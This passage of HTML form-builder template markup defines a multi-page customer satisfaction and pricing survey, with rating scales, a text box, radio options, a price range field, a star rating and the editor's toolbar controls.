name="3_scale_radioform_id_temp" value="5" type="radio"></td></tr></tbody></table><label class="mini_label" id="3_mini_label_best" style="position: relative; top: 6px; font-size: 11px;"> I will recommend</label></div></td></tr></tbody></table></td><td id="X_3" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_3" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_3" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_3" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_3" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_3" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_3" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_3" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_3" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="4" type="type_scale_rating"><td colspan="2" id="4_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="4_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="4_label_sectionform_id_temp" class="wdform_scale_rating"><span id="4_element_labelform_id_temp" class="label">3. How satisfied are you with this [Product/Service]?</span><span id="4_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="4_element_sectionform_id_temp" class="wdform_scale_rating"><input type="hidden" value="type_scale_rating" name="4_typeform_id_temp" id="4_typeform_id_temp"><input type="hidden" value="no" name="4_requiredform_id_temp" id="4_requiredform_id_temp"><input type="hidden" value="5" id="4_scale_amountform_id_temp" name="4_scale_amountform_id_temp"><div id="4_elementform_id_temp" style="float: left;"><label class="mini_label" id="4_mini_label_worst" style="position: relative; top: 6px; font-size: 11px;">Not Satisfied </label><table id="4_scale_tableform_id_temp" style="display: inline-table;"><tbody><tr id="4_scale_tr1form_id_temp"><td id="4_scale_td1_1form_id_temp" style="text-align: center;"><span>1</span></td><td id="4_scale_td1_2form_id_temp" style="text-align: center;"><span>2</span></td><td id="4_scale_td1_3form_id_temp" style="text-align: center;"><span>3</span></td><td id="4_scale_td1_4form_id_temp" style="text-align: center;"><span>4</span></td><td id="4_scale_td1_5form_id_temp" style="text-align: center;"><span>5</span></td></tr><tr id="4_scale_tr2form_id_temp"><td id="4_scale_td2_1form_id_temp"><input id="4_scale_radioform_id_temp_1" name="4_scale_radioform_id_temp" value="1" type="radio"></td><td id="4_scale_td2_2form_id_temp"><input id="4_scale_radioform_id_temp_2" name="4_scale_radioform_id_temp" value="2" type="radio"></td><td id="4_scale_td2_3form_id_temp"><input id="4_scale_radioform_id_temp_3" name="4_scale_radioform_id_temp" value="3" type="radio"></td><td id="4_scale_td2_4form_id_temp"><input id="4_scale_radioform_id_temp_4" name="4_scale_radioform_id_temp" value="4" type="radio"></td><td id="4_scale_td2_5form_id_temp"><input id="4_scale_radioform_id_temp_5" name="4_scale_radioform_id_temp" value="5" type="radio"></td></tr></tbody></table><label class="mini_label" id="4_mini_label_best" style="position: relative; top: 6px; font-size: 11px;"> Completely Satisfied</label></div></td></tr></tbody></table></td><td id="X_4" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;4&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_4" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;4&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_4" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;4&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_4" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;4&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_4" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;4&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_4" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;4&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_4" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;4&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_4" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;4&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_4" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;4&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="5" type="type_textarea"><td colspan="2" id="5_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="5_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="5_label_sectionform_id_temp" class=""><span id="5_element_labelform_id_temp" class="label">4. What would make you more satisfied with this [Product/Service]?</span><span id="5_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="5_element_sectionform_id_temp" class=""><input type="hidden" value="type_textarea" name="5_typeform_id_temp" id="5_typeform_id_temp"><input type="hidden" value="no" name="5_requiredform_id_temp" id="5_requiredform_id_temp"><input type="hidden" value="no" name="5_uniqueform_id_temp" id="5_uniqueform_id_temp"><textarea class="input_deactive" id="5_elementform_id_temp" name="5_elementform_id_temp" title="" value="" onfocus="delete_value(''5_elementform_id_temp'')" onblur="return_value(''5_elementform_id_temp'')" onchange="change_value(''5_elementform_id_temp'')" style="width: 300px; height: 100px;"></textarea></td></tr></tbody></table></td><td id="X_5" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr></tbody></table></td></tr><tr class="wdform_footer"><td colspan="100" valign="top"><table width="100%" style="padding-right:170px"><tbody><tr id="form_id_temppage_nav1"><td id="page_numbersform_id_temp1" width="100%" valign="middle" align="center"><span class="page_numbersform_id_temp">1/3</span></td><td valign="middle" align="right"><button id="page_next_1" type="button" class="wdform_page_button" style="cursor: pointer;">Next</button></td></tr></tbody></table></td></tr></tbody><tbody id="form_id_tempform_view_img1" style="float:right ;"><tr><td width="0%"></td><td align="right"><img src="{$plugin_path}/images/minus.png" title="Show or hide the page" class="page_toolbar" onclick="show_or_hide(''1'')" onmouseover="chnage_icons_src(this,''minus'')" onmouseout="chnage_icons_src(this,''minus'')" id="show_page_img_1"></td><td><img src="{$plugin_path}/images/page_delete.png" title="Delete the page" class="page_toolbar" onclick="remove_page(''1'')" onmouseover="chnage_icons_src(this,''page_delete'')" onmouseout="chnage_icons_src(this,''page_delete'')"></td><td><img src="{$plugin_path}/images/page_delete_all.png" title="Delete the page with fields" class="page_toolbar" onclick="remove_page_all(''1'')" onmouseover="chnage_icons_src(this,''page_delete_all'')" onmouseout="chnage_icons_src(this,''page_delete_all'')"></td><td><img src="{$plugin_path}/images/page_edit.png" title="Edit the page" class="page_toolbar" onclick="edit_page_break(''1'')" onmouseover="chnage_icons_src(this,''page_edit'')" onmouseout="chnage_icons_src(this,''page_edit'')"></td></tr></tbody></table> <table cellpadding="4" cellspacing="0" class="wdform_table1" style="border-width: 1px; border-top-style: solid; border-top-color: black;"><tbody id="form_id_tempform_view2" page_title="Product Pricing" class="wdform_tbody1" next_title="Next" next_type="button" next_class="wdform_page_button" next_checkable="false" previous_title="Previous" previous_type="button" previous_class="wdform_page_button" previous_checkable="false"><tr class="wdform_tr1"><td class="wdform_td1"><table class="wdform_table2"><tbody class="wdform_tbody2"><tr id="6" type="type_radio"><td colspan="2" id="6_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="6_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="6_label_sectionform_id_temp" class=""><span id="6_element_labelform_id_temp" class="label">5. Do you feel our current price is merited by our product/service?</span><span id="6_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="6_element_sectionform_id_temp" class=""><input type="hidden" value="type_radio" name="6_typeform_id_temp" id="6_typeform_id_temp"><input type="hidden" value="no" name="6_requiredform_id_temp" id="6_requiredform_id_temp"><input type="hidden" value="no" name="6_randomizeform_id_temp" id="6_randomizeform_id_temp"><input type="hidden" value="no" name="6_allow_otherform_id_temp" id="6_allow_otherform_id_temp"><input type="hidden" value="1" name="6_rowcol_numform_id_temp" id="6_rowcol_numform_id_temp"><table><tbody id="6_table_little"><tr id="6_element_tr0"><td valign="top" id="6_td_little0" idi="0"><input type="radio" value="Yes, the price is about right" id="6_elementform_id_temp0" name="6_elementform_id_temp" onclick="set_default(''6'',''0'',''form_id_temp'')"><label id="6_label_element0" class="ch_rad_label" for="6_elementform_id_temp0">Yes, the price is about right</label></td></tr><tr id="6_element_tr1"><td valign="top" id="6_td_little1" idi="1"><input type="radio" value="No, the price is too low for your product" id="6_elementform_id_temp1" name="6_elementform_id_temp" onclick="set_default(''6'',''1'',''form_id_temp'')"><label id="6_label_element1" class="ch_rad_label" for="6_elementform_id_temp1">No, the price is too low for your product</label></td></tr><tr id="6_element_tr2"><td valign="top" id="6_td_little2" idi="2"><input type="radio" value="No, the price is to high for your product" id="6_elementform_id_temp2" name="6_elementform_id_temp" onclick="set_default(''6'',''2'',''form_id_temp'')"><label id="6_label_element2" class="ch_rad_label" for="6_elementform_id_temp2">No, the price is to high for your product</label></td></tr></tbody></table></td></tr></tbody></table></td><td id="X_6" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;6&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_6" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;6&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_6" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;6&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_6" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;6&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_6" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;6&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_6" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;6&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_6" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;6&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_6" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;6&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_6" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;6&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="7" type="type_range"><td colspan="2" id="7_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="7_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="7_label_sectionform_id_temp" class=""><span id="7_element_labelform_id_temp" class="label">6. What is the amount you would every pay for a product like ours</span><span id="7_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="7_element_sectionform_id_temp" class=""><input type="hidden" value="type_range" name="7_typeform_id_temp" id="7_typeform_id_temp"><input type="hidden" value="no" name="7_requiredform_id_temp" id="7_requiredform_id_temp"><input type="hidden" value="30" name="7_range_widthform_id_temp" id="7_range_widthform_id_temp"><input type="hidden" value="1" name="7_range_stepform_id_temp" id="7_range_stepform_id_temp"><table id="7_elemet_table_littleform_id_temp"><tbody><tr><td valign="middle" align="left"><span class="ui-spinner ui-widget ui-widget-content ui-corner-all"><input type="" value="" name="7_elementform_id_temp0" id="7_elementform_id_temp0" onkeypress="return check_isnum_or_minus(event)" style="width: 30px;" class="ui-spinner-input" autocomplete="off" role="spinbutton"><a class="ui-spinner-button ui-spinner-up ui-corner-tr ui-button ui-widget ui-state-default ui-button-text-only" tabindex="-1" role="button" aria-disabled="false"><span class="ui-button-text"><span class="ui-icon ui-icon-triangle-1-n">▲</span></span></a><a class="ui-spinner-button ui-spinner-down ui-corner-br ui-button ui-widget ui-state-default ui-button-text-only" tabindex="-1" role="button" aria-disabled="false"><span class="ui-button-text"><span class="ui-icon ui-icon-triangle-1-s">▼</span></span></a></span></td><td valign="middle" align="left"><span class="ui-spinner ui-widget ui-widget-content ui-corner-all"><input type="" value="" name="7_elementform_id_temp1" id="7_elementform_id_temp1" onkeypress="return check_isnum_or_minus(event)" style="width: 30px;" class="ui-spinner-input" autocomplete="off" role="spinbutton"><a class="ui-spinner-button ui-spinner-up ui-corner-tr ui-button ui-widget ui-state-default ui-button-text-only" tabindex="-1" role="button" aria-disabled="false"><span class="ui-button-text"><span class="ui-icon ui-icon-triangle-1-n">▲</span></span></a><a class="ui-spinner-button ui-spinner-down ui-corner-br ui-button ui-widget ui-state-default ui-button-text-only" tabindex="-1" role="button" aria-disabled="false"><span class="ui-button-text"><span class="ui-icon ui-icon-triangle-1-s">▼</span></span></a></span></td></tr><tr><td valign="top" align="left"><label class="mini_label" id="7_mini_label_from">From</label></td><td valign="top" align="left"><label class="mini_label" id="7_mini_label_to">To</label></td></tr></tbody></table></td></tr></tbody></table></td><td id="X_7" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_7" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;7&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="8" type="type_star_rating"><td valign="middle" align="left" id="8_label_sectionform_id_temp" class="wdform_star_rating"><span id="8_element_labelform_id_temp" class="label">7. Please rate the product </span><span id="8_required_elementform_id_temp" class="required"></span></td><td valign="top" align="left" id="8_element_sectionform_id_temp" class="wdform_star_rating toolbar_padding"><input type="hidden" value="type_star_rating" name="8_typeform_id_temp" id="8_typeform_id_temp"><input type="hidden" value="no" name="8_requiredform_id_temp" id="8_requiredform_id_temp"><input type="hidden" value="10" id="8_star_amountform_id_temp" name="8_star_amountform_id_temp"><input type="hidden" value="yellow" name="8_star_colorform_id_temp" id="8_star_colorform_id_temp"><input type="hidden" value="" id="8_selected_star_amountform_id_temp" name="8_selected_star_amountform_id_temp"><div id="8_elementform_id_temp" class="wdform_star_rating"><img id="8_star_0" src="{$plugin_path}/images/star.png" onmouseover="change_src(0,8,''form_id_temp'')" onmouseout="reset_src(0,8)" onclick="select_star_rating(0,8,''form_id_temp'')"><img id="8_star_1" src="{$plugin_path}/images/star.png" onmouseover="change_src(1,8,''form_id_temp'')" onmouseout="reset_src(1,8)" onclick="select_star_rating(1,8,''form_id_temp'')"><img id="8_star_2" src="{$plugin_path}/images/star.png" onmouseover="change_src(2,8,''form_id_temp'')" onmouseout="reset_src(2,8)" onclick="select_star_rating(2,8,''form_id_temp'')"><img id="8_star_3" src="{$plugin_path}/images/star.png" onmouseover="change_src(3,8,''form_id_temp'')" onmouseout="reset_src(3,8)" onclick="select_star_rating(3,8,''form_id_temp'')"><img id="8_star_4" src="{$plugin_path}/images/star.png" onmouseover="change_src(4,8,''form_id_temp'')" onmouseout="reset_src(4,8)" onclick="select_star_rating(4,8,''form_id_temp'')"><img id="8_star_5" src="{$plugin_path}/images/star.png" onmouseover="change_src(5,8,''form_id_temp'')" onmouseout="reset_src(5,8)" onclick="select_star_rating(5,8,''form_id_temp'')"><img id="8_star_6" src="{$plugin_path}/images/star.png" onmouseover="change_src(6,8,''form_id_temp'')" onmouseout="reset_src(6,8)" onclick="select_star_rating(6,8,''form_id_temp'')"><img id="8_star_7" src="{$plugin_path}/images/star.png" onmouseover="change_src(7,8,''form_id_temp'')" onmouseout="reset_src(7,8)" onclick="select_star_rating(7,8,''form_id_temp'')"><img id="8_star_8" src="{$plugin_path}/images/star.png" onmouseover="change_src(8,8,''form_id_temp'')" onmouseout="reset_src(8,8)" onclick="select_star_rating(8,8,''form_id_temp'')"><img id="8_star_9" src="{$plugin_path}/images/star.png" onmouseover="change_src(9,8,''form_id_temp'')" onmouseout="reset_src(9,8)" onclick="select_star_rating(9,8,''form_id_temp'')"></div></td><td id="X_8" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_8" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;8&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr></tbody></table></td></tr><tr valign="top" class="wdform_footer"><td colspan="100"><table width="100%"><tbody><tr id="form_id_temppage_nav2"><td valign="middle" align="left"><button id="page_previous_2" type="button" class="wdform_page_button" style="cursor: pointer;">Previous</button></td><td id="page_numbersform_id_temp2" width="100%" valign="middle" align="center"><span class="page_numbersform_id_temp">2/3</span></td><td valign="middle" align="right"><button id="page_next_2" type="button" class="wdform_page_button" style="cursor: pointer;">Next</button></td></tr></tbody></table></td></tr></tbody><tbody id="form_id_tempform_view_img2" style="float: right;"><tr valign="middle"><td width="0%"></td><td align="right"><img src="{$plugin_path}/images/minus.png" title="Show or hide the page" class="page_toolbar" id="show_page_img_2" onclick="show_or_hide(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;minus&quot;)" onmouseout="chnage_icons_src(this,&quot;minus&quot;)"></td><td><img src="{$plugin_path}/images/page_delete.png" title="Delete the page" class="page_toolbar" onclick="remove_page(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;page_delete&quot;)" onmouseout="chnage_icons_src(this,&quot;page_delete&quot;)"></td><td><img src="{$plugin_path}/images/page_delete_all.png" title="Delete the page with fields" class="page_toolbar" onclick="remove_page_all(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;page_delete_all&quot;)" onmouseout="chnage_icons_src(this,&quot;page_delete_all&quot;)"></td><td><img src="{$plugin_path}/images/page_edit.png" title="Edit the page" class="page_toolbar" onclick="edit_page_break(&quot;2&quot;)" 